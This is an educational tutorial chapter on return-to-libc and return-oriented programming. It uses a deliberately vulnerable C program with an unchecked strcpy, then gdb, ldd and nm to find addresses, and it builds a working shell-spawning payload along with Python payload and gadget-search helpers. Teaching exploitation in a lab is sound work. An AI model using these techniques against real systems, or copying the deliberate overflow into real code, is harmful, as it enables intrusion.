Return-oriented Programming (ROP)

The previous chapters discussed two kinds of execution targets: existing functions and custom shellcode. Redirecting execution to an existing function is rather inflexible, and several protection mechanisms prevent the injection of custom executable code, so a more advanced exploitation approach is required. A very simple ROP exploit was in fact already used to redirect execution to an existing function without parameters; this chapter explains the concept in more detail.

Return-to-libc

The following vulnerable example code is considered in this section.

rop_libc.c
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 rop_libc.c
#include <stdio.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[8] = {0};
 
    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }
 
    strcpy(buffer, argv[1]);
    return 0;
}

The application to be exploited is very small and contains no function worth redirecting execution to. At runtime, however, the code of all linked shared libraries is available as well. Because libc is available on almost every system, it is an omnipresent code base for attacks. Since it executes arbitrary shell commands, the system() function is a promising target for redirecting execution. The only requirement when returning into system() is to pass the command to be executed as the first parameter.

ldd is used to find the address at which the library is loaded for the example application.

$ ldd a.out
    linux-gate.so.1 (0xf7fd7000)
    libc.so.6 => /lib32/libc.so.6 (0xf7df9000)
    /lib/ld-linux.so.2 (0xf7fd9000)

Assuming an operating system with ASLR disabled, 0xf7df9000 is the base address of the library after loading; the offset of the system() function within the library still needs to be determined. nm is used to find this offset.

$ nm -D /lib32/libc.so.6 | grep system
0003a850 T __libc_system
00113c60 T svcerr_systemerr
0003a850 W system

Adding the library base address 0xf7df9000 and the function offset 0x0003a850 results in an absolute address of 0xf7e33850. The final piece of the exploit is the parameter for system(). Luckily, libc contains a "/bin/sh" string. gdb is used to find the address of this string.
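As a quick check of the address arithmetic, the calculation can be sketched in Python. The constants are the values from the ldd and nm output above; the function name absolute_address is only an illustrative choice.

```python
# Values taken from the ldd and nm output shown above.
LIBC_BASE = 0xF7DF9000      # load address reported by ldd (ASLR disabled)
SYSTEM_OFFSET = 0x0003A850  # offset of system() reported by nm -D


def absolute_address(base: int, offset: int) -> int:
    """Return the runtime address of a symbol in a 32-bit process."""
    return (base + offset) & 0xFFFFFFFF


system_addr = absolute_address(LIBC_BASE, SYSTEM_OFFSET)
print(hex(system_addr))  # 0xf7e33850
```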

Load the application into the debugger and set a breakpoint in the main function. Start the application and wait for the breakpoint to be hit.

$ gdb -q a.out 
Reading symbols from a.out...done.
(gdb) break main
Breakpoint 1 at 0x804843c: file rop_libc.c, line 7.
(gdb) run
Starting program: /home/memory-corruption/a.out 

Breakpoint 1, main (argc=1, argv=0xffffd414) at rop_libc.c:7
7	    char buffer[8] = {0};

To restrict the search for the string to the library, its start and end addresses need to be known. Although the start address was already discovered via ldd, the end address is still unknown. gdb provides easy access to the address mappings of the process, including those of the shared libraries.

(gdb) info proc mappings 
process 2955
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	 0x8048000  0x8049000     0x1000        0x0 /home/memory-corruption/a.out
	 0x8049000  0x804a000     0x1000        0x0 /home/memory-corruption/a.out
	 0x804a000  0x804b000     0x1000     0x1000 /home/memory-corruption/a.out
	0xf7df7000 0xf7df9000     0x2000        0x0 
	0xf7df9000 0xf7faa000   0x1b1000        0x0 /lib32/libc-2.24.so
	0xf7faa000 0xf7fac000     0x2000   0x1b0000 /lib32/libc-2.24.so
	0xf7fac000 0xf7fad000     0x1000   0x1b2000 /lib32/libc-2.24.so
	0xf7fad000 0xf7fb0000     0x3000        0x0 
	0xf7fd2000 0xf7fd4000     0x2000        0x0 
	0xf7fd4000 0xf7fd7000     0x3000        0x0 [vvar]
	0xf7fd7000 0xf7fd9000     0x2000        0x0 [vdso]
	0xf7fd9000 0xf7ffc000    0x23000        0x0 /lib32/ld-2.24.so
	0xf7ffc000 0xf7ffd000     0x1000    0x22000 /lib32/ld-2.24.so
	0xf7ffd000 0xf7ffe000     0x1000    0x23000 /lib32/ld-2.24.so
	0xfffdd000 0xffffe000    0x21000        0x0 [stack]

It can be concluded that the end address of libc is 0xf7fad000. This range is now used to search for the "/bin/sh" string.
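Before running the search, the range can be double-checked with a short script. The following Python sketch assumes the mapping table has been copied into a string in the column layout printed by gdb above; library_range and SAMPLE are hypothetical names used only for this illustration.

```python
def library_range(mappings: str, name: str) -> tuple:
    """Return (lowest start, highest end) over all mappings of `name`."""
    starts, ends = [], []
    for line in mappings.splitlines():
        fields = line.split()
        # Lines for mapped files have five columns; the last is the object file.
        if len(fields) == 5 and name in fields[4]:
            starts.append(int(fields[0], 16))
            ends.append(int(fields[1], 16))
    if not starts:
        raise ValueError(f"no mapping found for {name!r}")
    return min(starts), max(ends)


# Excerpt of the mapping table shown above.
SAMPLE = """\
0xf7df7000 0xf7df9000     0x2000        0x0
0xf7df9000 0xf7faa000   0x1b1000        0x0 /lib32/libc-2.24.so
0xf7faa000 0xf7fac000     0x2000   0x1b0000 /lib32/libc-2.24.so
0xf7fac000 0xf7fad000     0x1000   0x1b2000 /lib32/libc-2.24.so
0xf7fad000 0xf7fb0000     0x3000        0x0
"""

start, end = library_range(SAMPLE, "libc")
print(hex(start), hex(end))  # 0xf7df9000 0xf7fad000
```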

(gdb) find 0xf7df9000,0xf7fad000,"/bin/sh"
0xf7f55cc8
1 pattern found.
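The same kind of lookup can be sketched without a debugger by searching the bytes of the library file. This is only a sketch under an assumption: it treats the file offset as the offset from the load address, which holds for the first mapping in the table above (file offset 0x0) but not in general. The function name find_string_address and the synthetic image are illustrative.

```python
def find_string_address(image: bytes, base: int, needle: bytes) -> int:
    """Return base + offset of the first NUL-terminated occurrence of needle."""
    offset = image.find(needle + b"\x00")
    if offset < 0:
        raise ValueError("string not found")
    return base + offset


# Offset of the gdb hit relative to the libc base address.
print(hex(0xF7F55CC8 - 0xF7DF9000))  # 0x15ccc8

# Synthetic stand-in for a library image: 16 bytes of header, then the string.
image = b"\x7fELF" + b"\x00" * 12 + b"/bin/sh\x00"
print(hex(find_string_address(image, 0x1000, b"/bin/sh")))  # 0x1010
```

For the real library, image would be the content of /lib32/libc.so.6 read in binary mode and base the load address 0xf7df9000; the result should still be verified in gdb.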

The payload is structured as follows. First, the 8 bytes of the buffer are filled. Next, the 4 bytes of the saved EBP are overwritten as well. The return address is then overwritten with the address of system(). To maintain the stack frame layout that system() expects, a dummy return address for system() follows. Finally, the address of "/bin/sh" is added as the parameter to system(). All addresses are encoded in little-endian byte order. Passing this payload to the program spawns a command shell.

$ ./a.out $(echo -en "AAAAAAAABBBB\x50\x38\xe3\xf7CCCC\xc8\x5c\xf5\xf7")
$
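The payload layout can also be assembled programmatically, which avoids byte-order mistakes when writing the addresses by hand. The following Python sketch uses the addresses determined above; build_payload is an illustrative name, and the addresses only apply to this particular system with ASLR disabled.

```python
import struct

SYSTEM_ADDR = 0xF7E33850  # libc base address + offset of system()
BINSH_ADDR = 0xF7F55CC8   # address of "/bin/sh" found with gdb


def build_payload() -> bytes:
    payload = b"A" * 8                          # fill buffer[8]
    payload += b"B" * 4                         # overwrite the saved EBP
    payload += struct.pack("<I", SYSTEM_ADDR)   # return address: system()
    payload += b"C" * 4                         # dummy return address for system()
    payload += struct.pack("<I", BINSH_ADDR)    # first parameter of system()
    return payload


payload = build_payload()
# strcpy() stops at the first NUL byte, so the payload must not contain one.
assert b"\x00" not in payload
print(payload)
```

The "<I" format packs each address as a 4-byte little-endian unsigned integer, matching the escaped bytes in the echo command.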

ROP Chains

System calls expect their parameters in registers rather than on the stack. Because a buffer overflow cannot overwrite registers directly, the above concept does not apply to them. Furthermore, the x64 architecture passes parameters in registers not only for system calls but also for ordinary function calls.

Return-oriented programming takes the concept of return-to-libc one step further: instead of a single function, several small code chunks are used. The exploit payload thus consists of multiple return addresses, each pointing to a small code chunk that is terminated by a ret instruction. These code chunks are commonly called "gadgets". Chaining them together results in a so-called "ROP chain". Note that the instruction sequence of a gadget does not need to be code that the original application intended. As shown in the chapter about NOP sleds, decoding opcodes starting at a different offset changes their meaning and the resulting instructions.
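The effect of decoding at a different offset can be illustrated with a minimal Python sketch that looks for byte sequences ending in the ret opcode 0xc3. The example bytes b8 58 c3 00 00 encode the single instruction mov eax, 0xc358; starting one byte later, the bytes 58 c3 decode as pop eax; ret. The function name gadget_candidates and the max_len parameter are illustrative, and every candidate would still have to be checked with a disassembler.

```python
RET = 0xC3  # opcode of the near "ret" instruction on x86


def gadget_candidates(code: bytes, max_len: int = 3):
    """Yield (start, end) byte ranges that end in a ret opcode."""
    for end, byte in enumerate(code):
        if byte != RET:
            continue
        # Try every start position up to max_len bytes before the ret.
        for start in range(max(0, end - max_len), end + 1):
            yield start, end + 1


# Intended instruction: mov eax, 0x0000c358 (b8 58 c3 00 00)
code = bytes.fromhex("b858c30000")
for start, end in gadget_candidates(code):
    print(start, code[start:end].hex())
```

Not every candidate is usable: decoding from offset 0 yields the original mov, which swallows the c3 byte as part of its immediate operand.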

Toy Example

Before moving on to a real-world example application, a toy example is presented to further illustrate the basic concept. The following gadgets are assumed to be available.

; Gadget 1
xor eax, eax
ret
; Gadget 2
inc eax
ret
; Gadget 3
mov ebx, eax
ret
; Gadget 4
pop ecx
pop edx
ret
; Gadget 5
push eax
ret
; Gadget 6
inc ecx
ret

The goal is to reach the following register state:

  • EAX = 3
  • EBX = 2
  • ECX = 1
  • EDX = 0

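There are several gadget sequences that reach the target state. One solution sequence is listed below, together with the register state after each gadget. The example is deliberately simplified: Gadget 5 is assumed to place the zero from EAX on the stack, where Gadget 4 pops it into ECX and EDX. On real x86, the ret of Gadget 5 would itself consume the pushed value as a return address, so a real chain would instead place the values for Gadget 4 as data words in the payload directly after the address of Gadget 4.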

Gadget 1
EAX = 0, EBX = undefined, ECX = undefined, EDX = undefined

Gadget 5
EAX = 0, EBX = undefined, ECX = undefined, EDX = undefined

Gadget 4
EAX = 0, EBX = undefined, ECX = 0, EDX = 0

Gadget 6
EAX = 0, EBX = undefined, ECX = 1, EDX = 0

Gadget 2
EAX = 1, EBX = undefined, ECX = 1, EDX = 0

Gadget 2
EAX = 2, EBX = undefined, ECX = 1, EDX = 0

Gadget 3
EAX = 2, EBX = 2, ECX = 1, EDX = 0

Gadget 2
EAX = 3, EBX = 2, ECX = 1, EDX = 0
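The toy example can be traced with a small Python sketch that models the chain as a list of stack words. This is a variant under stated assumptions, not the exact sequence listed above: because a real push eax; ret would jump to the address held in EAX, the sketch omits Gadget 5 and places two zero words for Gadget 4 directly in the chain. The labels G1 to G6 stand in for gadget addresses, and run_chain is an illustrative name.

```python
def run_chain(chain):
    """Execute a toy ROP chain and return the final register state."""
    regs = {"eax": None, "ebx": None, "ecx": None, "edx": None}
    stack = list(chain)  # stack[0] is the word the next ret or pop consumes

    def pop():
        return stack.pop(0)

    while stack:
        gadget = pop()        # models the ret of the previous gadget
        if gadget == "G1":    # xor eax, eax
            regs["eax"] = 0
        elif gadget == "G2":  # inc eax
            regs["eax"] += 1
        elif gadget == "G3":  # mov ebx, eax
            regs["ebx"] = regs["eax"]
        elif gadget == "G4":  # pop ecx; pop edx
            regs["ecx"] = pop()
            regs["edx"] = pop()
        elif gadget == "G6":  # inc ecx
            regs["ecx"] += 1
        else:
            raise ValueError(f"unknown gadget {gadget!r}")
    return regs


# Gadget labels interleaved with the two data words consumed by Gadget 4.
chain = ["G1", "G4", 0, 0, "G6", "G2", "G2", "G3", "G2"]
print(run_chain(chain))  # {'eax': 3, 'ebx': 2, 'ecx': 1, 'edx': 0}
```

The model ignores 32-bit wrap-around and treats gadget addresses as labels, which is sufficient to follow how each ret hands control to the next entry of the chain.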